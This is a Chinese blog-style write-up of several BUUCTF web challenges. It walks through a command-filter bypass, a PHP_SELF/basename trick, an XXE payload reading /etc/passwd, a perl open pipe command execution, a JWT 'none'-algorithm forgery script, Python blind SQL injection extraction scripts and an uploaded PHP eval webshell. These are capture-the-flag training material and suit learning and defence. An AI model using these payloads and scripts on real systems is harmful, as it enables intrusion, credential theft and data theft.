BuuCTF刷题记录

[FBCTF2019]RCEService 1

这题很有意思啊

需要我们传一个cmd为json格式的那就随便传传

先看看当前目录存在哪些文件

尝试一下读取文件cat发现失败了，不知道啥原因，发现cat，nl等命令都无法执行

怀疑有preg_match函数匹配，先用回车符%0A绕过试试

嘿嘿绕过去了并没发现flag，但是看到了cat命令并没有在usr目录下而是在根目录的bin目录下

直接用bin目录下的cat查看当前目录的index.php

成功拿到源码，其实也无所谓了直接rce就行了

[Zer0pts2020]Can you guess it?

题目描述：

<?php
include 'config.php'; // FLAG is defined in config.php

if (preg_match('/config\.php\/*$/i', $_SERVER['PHP_SELF'])) {
  exit("I don't know what you are thinking, but I won't let you read it :)");
}

if (isset($_GET['source'])) {
  highlight_file(basename($_SERVER['PHP_SELF']));
  exit();
}

$secret = bin2hex(random_bytes(64));
if (isset($_POST['guess'])) {
  $guess = (string) $_POST['guess'];
  if (hash_equals($secret, $guess)) {
    $message = 'Congratulations! The flag is: ' . FLAG;
  } else {
    $message = 'Wrong.';
  }
}
?>
<!doctype html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <title>Can you guess it?</title>
  </head>
  <body>
    <h1>Can you guess it?</h1>
    <p>If your guess is correct, I'll give you the flag.</p>
    <p><a href="?source">Source</a></p>
    <hr>
<?php if (isset($message)) { ?>
    <p><?= $message ?></p>
<?php } ?>
    <form action="index.php" method="POST">
      <input type="text" name="guess">
      <input type="submit">
    </form>
  </body>
</html>

打开题目，首先进行代码审计，发现有个basename函数，查询一下

发现他返回路径中的文件名部分，而后面的PHP_SELF存在一个漏洞

PHP_SELF是一个返回正在执行的当前脚本的变量。此变量返回当前文件的名称和路径（来自根文件夹）。

PHP_SELF漏洞 - 简书

$_SERVER['PHP_SELF']这个会根据URI解析忽略掉多余的部分只保留参数部分

$_SERVER用于获取当前执行脚本的文件名。例如，在地址为 http://c.biancheng.net/test.php/foo 的脚本中使用 $_SERVER[‘PHP_SELF’]将得到 /test.php/foo

如果url是：http://xxx/index.php/a.php/a/b/c/d/?source
$_SERVER[‘PHP_SELF’]的值就是index.php/a.php/a/b/c/d/ （忽略传参）

我大概了解了flag包含在config.php里面，但是有个正则匹配不能匹配到这个config.php而且还需要绕过basename函数

basename可以理解为对传入的参数路径截取最后一段作为返回值，但是该函数发现最后一段为不可见字符时会退取上一层的目录

根据basename发现一定存在文件名，也就是一定要存在source，也就是在末尾加上特定字符绕过正则后能被basename函数消去，绕过正则可以使用不存在于ascii码表中的字符，比如中文符号？、《》、中文等

从而绕过

 

$secret = bin2hex(random_bytes(64));
if (isset($_POST['guess'])) {
  $guess = (string) $_POST['guess'];
  if (hash_equals($secret, $guess)) {
    $message = 'Congratulations! The flag is: ' . FLAG;
  } else {
    $message = 'Wrong.';
  }
}

但是这里头有个测信道之时序攻击

什么是时序攻击 · 面试 · 看云

而使用hash_equals成功抵御了时序攻击

[NCTF2019]True XML cookbook

拿到题目后首先看看后台，是否存在逻辑的登录绕过，结合题目所说XML cookie怀疑是XML注入

但是并没有利用点，只能抓包查看

有两点利用点post的格式是xml格式，并且content-type类型为xml说明存在XXE

外部实体注入，之后就可以进行测试，首先在网上找到poc

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE a [
 <!ENTITY abc SYSTEM "file:///etc/passwd">
 ]>
<user><username>&a;</username><password>123456</password></user>

这时可以发现可以成功读取，之后直接读取flag发现flag并没有在根目录下，而去读源码也没有任何信息，这样没思路了嘛并不是还可以去看看内网存活主机

/etc/hosts 储存域名解析的缓存
/etc/passwd 用户密码
/proc/net/arp 每个网络接口的arp表中dev包

一般有过内网渗透的小伙伴一般比较熟悉，上述一般都需要测试一下

只存在一个网段，访问一下发现没有flag，说明在C段，用爆破器爆破但是并没有东西

之后找到博主说由于BUUCTF转用了K8S管理， 具体情况看/proc/net/fib_trie

发现还有一个网段：直接用爆破器爆破即可

[HITCON 2017]SSRFme

进来就是代码审计

<?php
    if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {  
$http_x_headers = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']);    #explode:把字符串打散为数组 .
$_SERVER['REMOTE_ADDR'] = $http_x_headers[0];   REMOTE_ADDR:代表客户端IP
    }
echo $_SERVER["REMOTE_ADDR"];
$sandbox = "sandbox/" . md5("orange" . $_SERVER["REMOTE_ADDR"]);
@mkdir($sandbox);   
@chdir($sandbox);进入当前文件夹   
$data = shell_exec("GET " . escapeshellarg($_GET["url"]));
shell_exec:通过 shell 环境执行命令，并且将完整的输出以字符串的方式返回
escapeshellarg:把字符串转码为可以在 shell 命令里使用的参数
$_GET:通过 URL 参数（又叫 query string）传递给当前脚本的变量的数组
$info = pathinfo($_GET["filename"]);            pathinfo() :函数以数组的形式返回关于文件路径的信息。   [filename]: 不包含后缀的文件名
$dir = str_replace(".", "", basename($info["dirname"]));
str_replace() 函数替换字符串中的一些字符（区分大小写）。basename()函数返回路径中的文件名部分
@mkdir($dir);
@chdir($dir);
@file_put_contents(basename($info["basename"]), $data);  file_put_contents  将一个字符串写入文件
highlight_file(__FILE__);
?>

前半部分很简单，就是需要构造一个路径

<?php
$sandbox = md5("orange10.244.80.12");
echo $sandbox;

路径有了就需要看后半部分，如何进行ssrf了，说实话我没啥好的思路，跟大众思路

利用file进行open命令执行

发现这个函数以数组形式返回了文件信息

最后

最后也是最重要的是file_put_contents(basename($info["basename"]), $data);

这个将我们linux命令生成的结果，放入了文件中（如果传入的文件名是123，那么$data就被放入sandox/cfbb870b58817bf7705c0bd826e8dba7/123中）
这里有perl语言中，open函数存在命令执行漏洞：如果open文件名中存在管道符（也叫或符号|），就会将文件名直接以命令的形式执行，然后将命令的结果存到与命令同名的文件中。本题中调用了GET函数，而GET函数底层调用了open函数，故存在漏洞。（这我也是头一次使用）

直接构造

?url=/&filename=a

主要的知识点：perl函数看到要打开的文件名中如果以管道符（键盘上那个竖杠|）结尾，就会中断原有打开文件操作，并且把这个文件名当作一个命令来执行，并且将命令的执行结果作为这个文件的内容写入。这个命令的执行权限是当前的登录者。如果你执行这个命令，你会看到perl程序运行的结果。

所以我们需要先创建一个与我们需要执行命令相同的文件，然后使用管道截获该流程，使之为命令的执行。ps：这里要创建一模一样的文件

poc：

创建与命令执行相同的文件。

/?url=file:bash -c /readflag|&filename=bash -c /readflag| # 这里使用file协议，bash -c就是将目标当作可执行文件运行，如bash -c "echo 'hello World'"  

修改存储的文件，并读取flag输入到存储的文件中去。直接rce。

/?url=file:bash -c /readflag|&filename=a   # 这里运行两次是因为命令要执行首先需要文件存在，第一次执行时文件不存在，创建文件，第二次执行命令。

直接得到flag

[HFCTF2020]EasyLogin

JWT的格式如下：

由.分割的三部分组成，这三部分依次是：

• 标头（Header）：标头通常由两部分组成：令牌的类型，即JWT；以及所使用的签名算法，例如 HMAC SHA256 或 RSA。
• 有效载荷（Payload）：包含声明。声明是关于实体（通常是用户）和附加数据的声明。声明分为三种类型：注册声明、公共声明和私人声明。
• 签名（Signature）：标头、有效载荷、密钥、标头中指定的算法，对其进行签名。

空加密算法攻击

JWT支持使用空加密算法，可以在header中指定alg为None，同时把signature设置为空(即不添加signature字段)，提交到服务器，任何token都可以通过服务器的验证

很明显这里token可以伪造

宸极实验室—『红蓝对抗』JWT 攻击手法 - 知乎

无签名的话就可以根据脚本构造

import time
import jwt

# 头信息
head = {
    "alg": "none",
}
# payload
payload = {
    "iat": time.time(),
    "name": "admin"
}
# 调用jwt库，生成json web token
#                                秘钥      加密算法
jwt_token = jwt.encode(payload, "1121", algorithm="none", headers=head)
# 输出
print(jwt_token)

这里简化一下

import jwt

token = jwt.encode(
    {
        "secretid": [],
        "username": "admin",
        "password": "123456",
        "iat": 1699605189
    },
    algorithm="none", key="").encode(encoding='utf-8')

print(token)

得到token bp抓包放包访问api/flag接口即可

注意此题用的koa框架，可自行百度

[CISCN2019 总决赛 Day2 Web1]Easyweb

一进来就是登录框，直接源码找东西

啊哈发现一个user.php，发现进不去，应该需要登陆，又发现一个image.php

这时会发现id为1，2，3的时候会有回显，其他时候没有

啊没东东了，我就开扫目录吧，发现一个robots.txt

发现有个备份文件，但是没有说明哪个php的只能一个一个试试发现image.php的源码

<?php
include "config.php";

$id=isset($_GET["id"])?$_GET["id"]:"1";
$path=isset($_GET["path"])?$_GET["path"]:"";

$id=addslashes($id);
$path=addslashes($path);

$id=str_replace(array("\\0","%00","\\'","'"),"",$id);
$path=str_replace(array("\\0","%00","\\'","'"),"",$path);

$result=mysqli_query($con,"select * from images where id='{$id}' or path='{$path}'");
$row=mysqli_fetch_array($result,MYSQLI_ASSOC);

$path="./" . $row["path"];
header("Content-Type: image/jpeg");
readfile($path);

看到addslashes函数就知道存在sql注入了，应该还是盲注，可以选择时间盲注以及二分法盲注

通过代码审计以及线下测试可以发现

通过此函数将\转义了\0为字符串，我就可以通过构造\\0通过字符串替换结果剩下一个\

而\在与单引号相结合成一个普通字符串，这样的话，我们就可以通过select * from images where id='{$id}' or path='{$path}'"这个sql语句将第一个'与第三个'相结合后面构造盲注语句即可，

构造&path=/**/or/**/2=if(length(database())>1,2,1=2)--+,if语句如果第一位为真则返回2使得2=2为真得到图片的十六进制，而如果<1则为假，返回不了图片的16进制，返回为空

我们可以通过观察发现

此时可以使用二分法盲注得到答案

import requests
target="http://6daf6780-f65c-4d15-8506-f834ba4c748a.node4.buuoj.cn:81/image.php?id=\\0"

def getTable():
    table_name = ""
    for i in range(1,50):     #注意是从1开始，substr函数从第一个字符开始截取
        low = 32
        high = 127
        mid = (low+high)//2
        while low < high:    
            payload = "&path= or 2=if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),%d,1))>%d,2,1=1)--+" % (i,mid)
            r = requests.get(url=target+payload)
            if "JFIF" in r.text:      #为真时说明该字符在ascii表后面一半
                low = mid+1
            else:
                high = mid
            mid = (low+high)//2
        if low <= 32 or high >= 127:    #没找到
            break
        table_name += chr(mid)   #将ascii码转换为字符

    print("表名：" + table_name)
def getcolunms():
    column_name = ""
    for i in range(1, 50):  # 注意是从1开始，substr函数从第一个字符开始截取
        low = 32
        high = 127
        mid = (low + high) // 2
        while low < high:  # 二分法但是'以及“被过滤故采用十六进制，users对应的16进制为0x7573657273
            payload = "&path= or 2=if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name=0x7573657273),%d,1))>%d,2,1=1)--+" % (
            i, mid)
            r = requests.get(url=target + payload)
            if "JFIF" in r.text:  
                low = mid + 1
            else:
                high = mid
            mid = (low + high) // 2
        if low <= 32 or high >= 127:  # 没找到
            break
        column_name += chr(mid)  # 将ascii码转换为字符

    print("表名：" + column_name)

def getUsername():          
    username = ""
    for i in range(1,50):     
        low = 32
        high = 127
        mid = (low+high)//2
        while low < high:      
            payload = "&path= or 1=if(ascii(substr((select group_concat(password) from users),%d,1))>%d,2,1=1)--+" % (i,mid)
            r = requests.get(url=target+payload)
            if "JFIF" in r.text:     
                low = mid+1
            else:
                high = mid
            mid = (low+high)//2
        if low <= 32 or high >= 127:    
            break
        username += chr(mid)  
    print("password：" + username)

if __name__ == '__main__':

    getUsername()
    getTable()
    getcolunms()

登录进去发现是一个文件上传，并且把所有上传文件名以日志形式记录

我发现后缀是php格式的日志，于是想到直接文件名传木马

但是php被过滤了，用<scirpt>标签试试也不行，

传上去了但是执行不了，只能通过短标签了

直接<=@eval($_POST[1]);?>

发现上传成功成功读取flag

此题难度主要在二分法盲注脚本上了也不算太难

[GYCTF2020]Ezsqli

查看题目ezsqli，说明存在sql注入,首先输入经典语句发现存在sql注入检测，需要用bp进行fuzz一下，查看可用的mysql字段

由此可以发现join以及information_schema表不能用了，只能借鉴文章绕过这个表

聊一聊bypass information_schema-安全客 - 安全资讯平台

information_schema.tables可以用sys.schema_table_statistics_with_buffer或sys.x$schema_flattened_keys，mysql.innodb_table_stats来代替

import requests
flag = ''
url="http://40b7a04e-bced-4b37-989d-3212db0fb5e3.node4.buuoj.cn:81/index.php"
result = ''
payload = "-100 || (ascii(substr((select group_concat(table_name) from sys.schema_table_statistics_with_buffer where table_schema=database()),{},1)))={};#"

for i in range(1, 80):
    for j in range(1,140):
        py=payload.format(i,j)
        data={"id":py}
        response=requests.post(url=url,data=data)
        if 'Nu1L' in response.text:
            #print(i)
            result+=chr(j)
            print(result)
            break

上述跑出表名，这时候该就该需要无列名注入，我这里写一下union查询以及join查询

当列名和ob_user表中列个数相同时，就会查出数据，而当不相同时就会报错

但是union，join被过滤了进行无列名盲注，可以参考(本题由于过滤了join，所以不能用join…using报错)

2 返回V&N
2||1=1 返回Nu1L
2||1=4 返回V&N
2查询的是V&N，如果||后面的表达式为True则返回Nu1L；false则返回V&N。

在这样的按位比较过程中，因为在里层的for()循环，字典顺序是从ASCII码小到大来枚举并比较的，假设正确值为b，那么字典跑到b的时候b=b不满足payload的大于号，只能继续下一轮循环，c>b此时满足了，题目返回真，出现了Nu1L关键字，这个时候就需要记录flag的值了，但是此时这一位的char是c，而真正的flag的这一位应该是b才对，所以flag += chr(char-1)，这就是为什么在存flag时候要往前偏移一位的原因

对于 payload 这个两个 select 查询的比较，是按位比较的，即先比第一位，如果相等则比第二位，这个是前提条件，就是只有前面的字符都相等，才可以继续比较下去，有点类似C语言的字符串大小比较的strcmp()函数

这里可以通过sqlyog一个一个测试

import requests

url='http://feba3704-bfa8-4ba5-8aaa-099f81214e7c.node3.buuoj.cn/index.php'
payload='1&&((select 1,"{}")>(select * from f1ag_1s_h3r3_hhhhh))'
flag=''
for j in range(200):
    for i in range(32,128):
        hexchar=flag+chr(i)
        py=payload.format(hexchar)
        datas={'id':py}
        re=requests.post(url=url,data=datas)
        if 'Nu1L' in re.text:
            flag+=chr(i-1)
            print(flag)
            break

chr(i-1)是((select 1,"{}")==(select * from f1ag_1s_h3r3_hhhhh))

 参考：深入浅出带你学习无列名注入-CSDN博客

直接跑出flag

好吧又学到一手